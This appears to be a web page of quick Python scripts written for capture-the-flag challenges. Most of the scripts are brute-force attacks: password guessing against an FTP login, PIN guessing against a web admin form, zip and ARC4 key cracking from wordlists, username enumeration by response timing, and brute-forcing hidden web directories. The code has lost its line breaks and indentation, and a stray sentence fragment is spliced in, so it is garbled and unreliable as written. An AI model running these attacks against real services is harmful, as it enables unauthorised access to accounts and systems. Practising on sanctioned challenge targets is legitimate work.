Examples and Quick Scripts
Brute forces all passwords from words.txt for the username secure_usertry/except loop.
from ftplib import FTPimport timeβftp = FTP()HOST = 'services.cyberprotection.agency'PORT = 2121ftp.set_debuglevel(2)ββdictionary = 'words.txt'password = Noneβwith open(dictionary, 'r') as f:for line in f.readlines():password = line.strip('\n')print('trying ' + password)time.sleep(0.001)try:ftp.connect(HOST, PORT)ftp.login(user='secure_user', passwd=password)ftp.quit()except:passprint(password)
ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.
from arc4 import ARC4βcipher = b'\x18\x34\xe1\xb2\x17\x0c\x2a\xc5\x21\x26\x77\xe3\xae\x48\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'βwith open("big_set.txt", "r") as keys:for line in keys:line = line.strip()arc4 = ARC4(bytes(line, 'utf-8'))new = arc4.decrypt(cipher)try:decoder = bytes.fromhex(new.hex()).decode('utf-8')print("Key " + line + " made this:\n" + decoder)except UnicodeDecodeError:pass
This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password.
Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.
import base64import zipfileβdictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'βwith open(dictionary, 'r', errors='ignore') as f:for line in f.readlines():password = line.strip('\n')#print(f'Raw password is {password}')encoded = base64.b64encode(str.encode(password))#print(f'Encoded password is {encoded}')βwith zipfile.ZipFile('./base64.zip','r') as zip_ref:try:zip_ref.extractall(pwd=encoded)print(f'Found! Password is {password}, encoded is {encoded}!')quit()except:pass
This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally thereβs a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.
import urllibimport requestsimport reβurl = "https://vuln.server/admin_login"βpin = 0βwhile pin < 1000:#headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}payload = {'email':'[email protected]','password':str(pin).zfill(3)}req = requests.post(url, data=payload, allow_redirects=True)if not re.findall('Access Denied', req.text):print(f'\npin is {str(pin).zfill(3)}!\n')breakprint(str(pin).zfill(3), req.status_code, len(req.content))pin = pin + 1βprint('finished testing')
This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.
import requestsfrom string import ascii_lowercasewith open('surnames.txt') as f:lines = f.read().splitlines()for lname in lines:for init in ascii_lowercase:username = init+lnamer = requests.post('http://m4lwhere.org/login.php', data = {'user':username,'pass':'haha'})roundtrip = r.elapsed.total_seconds()print(f'{roundtrip} for {username}')
This challenge required connecting to the socket and brute forcing the first byte back, I didnβt fully finish this challenge because it was a little frustrating. I need to spend more time on this script.
import sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect(('cfta-ne01.allyourbases.co',8017))buf = s.recv(1024)s.recv(1024)conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')conv = conv + '\n'print(conv)s.sendall(bytes(conv, encoding='UTF-8'))ans = s.recv(1024)win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8')print(win)s.close() . This reads the dictionary file, strips the EOL markers, and attempts to authenticate with a
import socketimport timeβdef connect():s.connect(('challenges.ctfd.io',30468))βdef recv():recv = s.recv(1024)print(recv)βfor i in range(ord('A'),ord('z')+1):s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print(f'trying {chr(i)}')s.connect(('challenges.ctfd.io',30468))recv = s.recv(1024)print(recv)s.sendall(bytes(chr(i), encoding='utf8'))recv = s.recv(1024)print(recv)s.close()
Written by Jess! Automatically finds the decoded input using the enchant library. Searches for legitimate words in the English dictionary, very cool!
import enchantd = enchant.Dict("en_US")βcipher=input("Enter Caesar Shift Cipher to Decode: ")for n in range(26):decode=""wordfound=""for x in range(0,len(cipher)):if ord(cipher[x]) in range(97,123):decode+=(chr(((ord(cipher[x])-96+n)%26)+97))elif ord(cipher[x]) in range(65,91):decode+=(chr(((ord(cipher[x])-64+n)%26)+65))elif ord(cipher[x])==(32):checkword=d.check(decode)if checkword:wordfound=("Found!")decode+=cipher[x]else:decode+=cipher[x]check=d.check(decode)print((n+1),decode,wordfound)
This program chooses some random integers and assigns them to a string. Nothing fancy.
import randomβseries = random.randint(1,3)βbook = random.randint(1,6)βpage = random.randint(1,300)βprint(f'Series {series}, Book {book}, Page {page}\n\n')
Quick way to create a list of all possible lowercase values
from string import ascii_lowercasefor a in ascii_lowercase:for b in ascii_lowercase:print(a+b)
Below is brute forcing all lowercase characters to find a hidden web dir
import requestsfrom string import ascii_lowercaseβurl = 'http://m4lwhere.org/'βfor a in ascii_lowercase:for b in ascii_lowercase:for c in ascii_lowercase:#print(a+b+c)fullUrl = url + a + b + cr = requests.get(fullUrl)if r.status_code != 404:print(f'Code {r.status_code} for {fullUrl}')else:pass
Same one, just with a progress bar!
import requestsfrom progress.bar import Barfrom string import ascii_lowercaseβurl = 'http://m4lwhere.org/'βwith Bar('Brute Forcing...', max=26*26*26-1) as bar:for a in ascii_lowercase:for b in ascii_lowercase:for c in ascii_lowercase:#print(a+b+c)fullUrl = url + a + b + cr = requests.get(fullUrl)if r.status_code != 404:print(f'\nCode {r.status_code} for {fullUrl}')else:bar.next()pass
